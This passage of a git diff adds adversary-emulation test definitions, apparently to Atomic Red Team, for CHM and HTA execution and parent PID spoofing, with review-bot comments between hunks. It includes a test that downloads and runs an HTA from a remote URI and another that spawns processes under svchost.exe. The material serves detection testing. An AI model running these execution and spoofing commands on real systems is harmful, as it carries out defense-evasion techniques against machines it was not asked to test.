and Invoke-ATHCompiledHelp + must be exported in the module. 
+ prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} + -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' + name: powershell + - name: Invoke CHM Simulate Double click + auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a + description: Executes a CHM file simulating a user double click. + supported_platforms: + - windows + input_arguments: + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' + name: powershell + - name: Invoke CHM with Script Engine and Help Topic + auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5 + description: Executes a CHM file with a defined script engine, ITS Protocol + Handler, and help topic extension. 
+ supported_platforms: + - windows + input_arguments: + topic_extension: + description: Default Help Topic + type: string + default: html + hh_file_path: + description: path of modified HH.exe + type: path + default: "$env:windir\\hh.exe" + infotech_storage_handler: + description: Default InfoTech Storage Protocol Handler + type: string + default: its + script_engine: + description: Default Script Engine + type: string + default: JScript + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler + #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath + #{hh_file_path} -CHMFilePath #{chm_file_path}' + name: powershell + - name: Invoke CHM Shortcut Command with ITS and Help Topic + auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247 + description: Executes a CHM file using the Shortcut Command method with a defined + ITS Protocol Handler, and help topic extension. 
+ supported_platforms: + - windows + input_arguments: + topic_extension: + description: Default Help Topic + type: string + default: html + hh_file_path: + description: path of modified HH.exe + type: path + default: "$env:windir\\hh.exe" + infotech_storage_handler: + description: Default InfoTech Storage Protocol Handler + type: string + default: its + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler + #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath + #{hh_file_path} -CHMFilePath #{chm_file_path}' + name: powershell T1542.002: technique: external_references: 
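Review bot: The `hh_file_path` argument in four of the five CHM tests is documented as `path of modified HH.exe`, but its default is the stock `$env:windir\hh.exe` and nothing in the hunk modifies it, so the description misleads anyone tuning the test or writing a detection around the binary; `description: Path to hh.exe (defaults to the system copy)` states what is actually used. The argument typing is also inconsistent within the hunk — `hh_file_path` is `type: path` while `chm_file_path` (default `Test.chm`) is `type: string` — and `Test.chm` is a relative path, so where the artifact is written depends on the invoking shell's working directory; saying so in the description would help responders locate the file after a run. As index.yaml is generated, these edits belong in atomics/T1218.001/T1218.001.yaml.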
@@ -28845,6 +29141,196 @@ defense-evasion: ' name: powershell + - name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral + Movement + auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447 + description: Executes an HTA Application using JScript script engine using local + UNC path simulating lateral movement. + supported_platforms: + - windows + input_arguments: + script_engine: + description: Script Engine to use + type: string + default: JScript + hta_file_path: + description: HTA file name and or path to be used + type: string + default: Test.hta + mshta_file_path: + description: Location of mshta.exe + type: string + default: "$env:windir\\system32\\mshta.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine + #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath + #{mshta_file_path}' + name: powershell + - name: Invoke HTML Application - Jscript Engine Simulating Double Click + auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33 + description: Executes an HTA Application using JScript script engine simulating + double click. 
+ supported_platforms: + - windows + input_arguments: + script_engine: + description: Script Engine to use + type: string + default: JScript + hta_file_path: + description: HTA file name and or path to be used + type: string + default: Test.hta + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine + #{script_engine} -SimulateUserDoubleClick' + name: powershell + - name: Invoke HTML Application - Direct download from URI + auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db + description: Executes an HTA Application by directly downloading from remote + URI. + supported_platforms: + - windows + input_arguments: + mshta_file_path: + description: Location of mshta.exe + type: string + default: "$env:windir\\system32\\mshta.exe" + hta_uri: + description: URI to HTA + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. 
+ prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}' + name: powershell + - name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol + Handler + auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af + description: Executes an HTA Application with JScript Engine, Rundll32 and Inline + Protocol Handler. + supported_platforms: + - windows + input_arguments: + rundll32_file_path: + description: Location of rundll32.exe + type: string + default: "$env:windir\\system32\\rundll32.exe" + script_engine: + description: Script Engine to use + type: string + default: JScript + protocol_handler: + description: Protocol Handler to use + type: string + default: About + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler + #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}' + name: powershell + - name: Invoke HTML Application - JScript Engine with Inline Protocol Handler + auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 + description: Executes an HTA Application with JScript Engine and Inline Protocol + Handler. 
+ supported_platforms: + - windows + input_arguments: + mshta_file_path: + description: Location of mshta.exe + type: string + default: "$env:windir\\system32\\mshta.exe" + script_engine: + description: Script Engine to use + type: string + default: JScript + protocol_handler: + description: Protocol Handler to use + type: string + default: About + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler + #{protocol_handler} -MSHTAFilePath #{mshta_file_path}' + name: powershell + - name: Invoke HTML Application - Simulate Lateral Movement over UNC Path + auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362 + description: Executes an HTA Application with Simulate lateral movement over + UNC Path. + supported_platforms: + - windows + input_arguments: + mshta_file_path: + description: Location of mshta.exe + type: string + default: "$env:windir\\system32\\mshta.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. 
+ prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath + #{mshta_file_path}' + name: powershell T1218.007: technique: created: '2020-01-24T14:38:49.266Z' 
@@ -29744,6 +30230,134 @@ defense-evasion: Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore name: powershell + - name: Parent PID Spoofing - Spawn from Current Process + auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 + description: Spawns a powershell.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine + ''#{command_line}'' -ParentId #{parent_pid}' + name: powershell + - name: Parent PID Spoofing - Spawn from Specified Process + auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb + description: Spawns a notepad.exe process as a child of the current process. 
+ supported_platforms: + - windows + input_arguments: + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + test_guid: + description: Defined test GUID + type: string + default: 12345678-1234-1234-1234-123456789123 + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid + #{test_guid}' + name: powershell + - name: Parent PID Spoofing - Spawn from svchost.exe + auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 + description: Spawnd a process as a child of the first accessible svchost.exe + process. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. 
+ prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, + ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | + Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} + -CommandLine ''#{command_line}''' + name: powershell + - name: Parent PID Spoofing - Spawn from New Process + auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db + description: Creates a notepad.exe process and then spawns a powershell.exe + process as a child of it. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_name: + description: Parent process to spoof from + type: path + default: "$Env:windir\\System32\\notepad.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. 
+ prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent + -FilePath #{file_path} -CommandLine ''#{command_line}''' + name: powershell T1550.002: technique: external_references: diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md index c764764d..4e26c477 100644 --- a/atomics/T1134.004/T1134.004.md +++ b/atomics/T1134.004/T1134.004.md @@ -10,6 +10,14 @@ Explicitly assigning the PPID may also enable elevated privileges given appropri - [Atomic Test #1 - Parent PID Spoofing using PowerShell](#atomic-test-1---parent-pid-spoofing-using-powershell) +- [Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process](#atomic-test-2---parent-pid-spoofing---spawn-from-current-process) + +- [Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process](#atomic-test-3---parent-pid-spoofing---spawn-from-specified-process) + +- [Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe](#atomic-test-4---parent-pid-spoofing---spawn-from-svchostexe) + +- [Atomic Test #5 - Parent PID Spoofing - Spawn from New Process](#atomic-test-5---parent-pid-spoofing---spawn-from-new-process) +
@@ -67,4 +75,182 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process +Spawns a powershell.exe process as a child of the current process. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| +| parent_pid | PID of process to spawn from | string | $PID| +| command_line | Specified command line to use | string | -Command Start-Sleep 10| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process +Spawns a notepad.exe process as a child of the current process. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| parent_pid | PID of process to spawn from | string | $PID| +| test_guid | Defined test GUID | string | 12345678-1234-1234-1234-123456789123| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe +Spawnd a process as a child of the first accessible svchost.exe process. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command_line | Specified command line to use | string | -Command Start-Sleep 10| +| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = 'svchost.exe' AND CommandLine LIKE '%'" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #5 - Parent PID Spoofing - Spawn from New Process +Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command_line | Specified command line to use | string | -Command Start-Sleep 10| +| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| +| parent_name | Parent process to spoof from | path | $Env:windir\System32\notepad.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + +
diff --git a/atomics/T1134.004/T1134.004.yaml b/atomics/T1134.004/T1134.004.yaml
index 78af0ff1..f8d817d8 100644
--- a/atomics/T1134.004/T1134.004.yaml
+++ b/atomics/T1134.004/T1134.004.yaml
@@ -51,3 +51,114 @@ atomic_tests:
 Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
 name: powershell
+- name: Parent PID Spoofing - Spawn from Current Process
+ auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
+ description: Spawns a powershell.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: $PID
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: -Command Start-Sleep 10
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: "Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}"
+ name: powershell
+
+- name: Parent PID Spoofing - Spawn from Specified Process
+ auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
+ description: Spawns a notepad.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: $PID
+ test_guid:
+ description: Defined test GUID
+ type: string
+ default: 12345678-1234-1234-1234-123456789123
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}'
+ name: powershell
+
+- name: Parent PID Spoofing - Spawn from svchost.exe
+ auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
+ description: Spawnd a process as a child of the first accessible svchost.exe process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: -Command Start-Sleep 10
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: "Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter \"Name = 'svchost.exe' AND CommandLine LIKE '%'\" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'"
+ name: powershell
+
+- name: Parent PID Spoofing - Spawn from New Process
+ auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
+ description: Creates a notepad.exe process and then spawns a powershell.exe process as a child of it.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: -Command Start-Sleep 10
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+ parent_name:
+ description: Parent process to spoof from
+ type: path
+ default: $Env:windir\System32\notepad.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: "Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'"
+ name: powershell
\ No newline at end of file
diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md
index dd94ab0a..ef702c12 100644
--- a/atomics/T1218.001/T1218.001.md
+++ b/atomics/T1218.001/T1218.001.md
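Review bot: In the T1134.004.yaml hunk, the "Parent PID Spoofing - Spawn from New Process" test starts a notepad.exe parent with `Start-Process -FilePath #{parent_name} -PassThru` but defines no `cleanup_command`, so every run leaves a notepad.exe behind (the powershell.exe children exit on their own through `-Command Start-Sleep 10`). The existing test in this file already cleans up with `Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore`; a matching `cleanup_command: Stop-Process -Name notepad -ErrorAction Ignore` under the executor would keep the test self-contained. The "Spawn from Specified Process" description, `Spawns a notepad.exe process as a child of the current process.`, does not match either its name or its command, which passes only `-ParentId`/`-TestGuid` and no file path — presumably notepad.exe is the harness default, which should be stated or the sentence hedged. The svchost.exe test has a typo, `description: Spawnd a process ...` → `description: Spawns a process ...`, which is carried into the generated index and markdown. All four `get_prereq_command` blocks install an unpinned AtomicTestHarnesses from the gallery; `Install-Module -Name AtomicTestHarnesses -RequiredVersion <pinned-version> -Scope CurrentUser -Force` would stop harness behaviour the tests rely on from drifting.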
@@ -10,6 +10,16 @@ A custom CHM file containing embedded payloads could be delivered to a victim th - [Atomic Test #2 - Compiled HTML Help Remote Payload](#atomic-test-2---compiled-html-help-remote-payload) +- [Atomic Test #3 - Invoke CHM with default Shortcut Command Execution](#atomic-test-3---invoke-chm-with-default-shortcut-command-execution) + +- [Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler](#atomic-test-4---invoke-chm-with-infotech-storage-protocol-handler) + +- [Atomic Test #5 - Invoke CHM Simulate Double click](#atomic-test-5---invoke-chm-simulate-double-click) + +- [Atomic Test #6 - Invoke CHM with Script Engine and Help Topic](#atomic-test-6---invoke-chm-with-script-engine-and-help-topic) + +- [Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic](#atomic-test-7---invoke-chm-shortcut-command-with-its-and-help-topic) +
@@ -83,4 +93,229 @@ hh.exe #{remote_chm_file} +
+
+ +## Atomic Test #3 - Invoke CHM with default Shortcut Command Execution +Executes a CHM file with the default Shortcut Command method. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| chm_file_path | Default path of CHM | string | Test.chm| +| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler +Executes a CHM file with the ITS protocol handler. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| +| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its| +| chm_file_path | Default path of CHM | string | Test.chm| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
